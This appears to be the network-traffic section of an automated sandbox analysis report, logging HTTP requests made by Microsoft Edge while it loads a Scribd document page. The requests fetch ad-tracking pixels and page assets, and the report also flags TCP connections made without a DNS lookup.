Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=bidswitch&ttd_tpi=1&ttd_puid=onetag&gdpr=0&gdpr_consent= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /track/cmb/generic?ttd_pid=bidswitch&ttd_tpi=1&ttd_puid=onetag&gdpr=0&gdpr_consent= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: OPTIONS /api/report?cat=bingbusiness HTTP/1.1Host: bzib.nelreports.netConnection: keep-aliveOrigin: https://business.bing.comAccess-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.130.217
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.130.217
Source: unknownTCP traffic detected without corresponding DNS query: 104.18.66.57
Source: unknownTCP traffic detected without corresponding DNS query: 104.18.66.57
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.129
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.129
Source: unknownTCP traffic detected without corresponding DNS query: 34.96.67.224
Source: unknownTCP traffic detected without corresponding DNS query: 34.96.67.224
Source: unknownTCP traffic detected without corresponding DNS query: 35.186.224.24
Source: unknownTCP traffic detected without corresponding DNS query: 35.186.224.24
Source: unknownTCP traffic detected without corresponding DNS query: 104.18.66.57
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.130.217
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.129
Source: unknownTCP traffic detected without corresponding DNS query: 34.96.67.224
Source: unknownTCP traffic detected without corresponding DNS query: 35.186.224.24
Source: unknownTCP traffic detected without corresponding DNS query: 69.147.82.61
Source: unknownTCP traffic detected without corresponding DNS query: 69.147.82.61
Source: unknownTCP traffic detected without corresponding DNS query: 23.44.111.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.44.111.32
Source: unknownTCP traffic detected without corresponding DNS query: 69.147.82.61
Source: unknownTCP traffic detected without corresponding DNS query: 23.44.111.32
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.41.14
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.41.14
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.41.14
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.41.14
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.41.14
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.41.14
Source: unknownTCP traffic detected without corresponding DNS query: 54.209.129.63
Source: unknownTCP traffic detected without corresponding DNS query: 54.209.129.63
Source: unknownTCP traffic detected without corresponding DNS query: 54.209.129.63
Source: unknownTCP traffic detected without corresponding DNS query: 54.209.129.63
Source: unknownTCP traffic detected without corresponding DNS query: 54.209.129.63
Source: unknownTCP traffic detected without corresponding DNS query: 54.209.129.63
Source: unknownTCP traffic detected without corresponding DNS query: 104.18.66.57
Source: unknownTCP traffic detected without corresponding DNS query: 34.96.67.224
Source: unknownTCP traffic detected without corresponding DNS query: 35.186.224.24
Source: unknownTCP traffic detected without corresponding DNS query: 104.18.66.57
Source: unknownTCP traffic detected without corresponding DNS query: 34.96.67.224
Source: unknownTCP traffic detected without corresponding DNS query: 35.186.224.24
Source: unknownTCP traffic detected without corresponding DNS query: 104.18.66.57
Source: unknownTCP traffic detected without corresponding DNS query: 35.186.224.24
Source: global trafficHTTP traffic detected: GET /document/806838445/Bank-Statement HTTP/1.1Host: www.scribd.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /webpack/assets/fonts/source_sans_pro/regular/source_sans_pro_regular.latin.e8ecbdac.woff2 HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /webpack/monolith/8260.0186aa9e3e0089f26ff6.css HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /webpack/assets/fonts/source_sans_pro/semibold/source_sans_pro_600.latin.76017e81.woff2 HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /AzZdHGSGtpxCq1Cpt/4e10b135-d113-4574-a477-270ace40bba7/osano.js?language=en HTTP/1.1Host: cmp.osano.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /v3/ HTTP/1.1Host: js.stripe.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/pages/1-b5a377eed6.jsonp HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0002.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0003.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0004.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0005.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/pages/2-9725faf5fd.jsonp HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/pages/3-4383b92e84.jsonp HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0006.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/pages/4-fb0a36a95f.jsonp HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0008.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0009.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0010.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0012.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0013.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/fonts/0011.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /A3071581-5350-42cd-80be-79cdd173e0991.js HTTP/1.1Host: utt.impactcdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /ping.min.js HTTP/1.1Host: cdn.pdst.fmConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /ads/pixel.js HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /i18n/pixel/events.js?sdkid=C8LT3611P6OF1JAH7LT0&lib=ttq HTTP/1.1Host: analytics.tiktok.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /uwt.js HTTP/1.1Host: static.ads-twitter.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /wi/ytc.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /a-05td.min.js HTTP/1.1Host: b-code.liadm.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /workspaces/7de87bc73aff1974945059e230fb953d/web_surveys.js HTTP/1.1Host: survey.survicate.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /ads/conversions-config/v1/pixel/config/t2_9t33vcn2_telemetry HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /js/24721610109.js HTTP/1.1Host: cdn.optimizely.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /s.js HTTP/1.1Host: cdn.siftscience.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
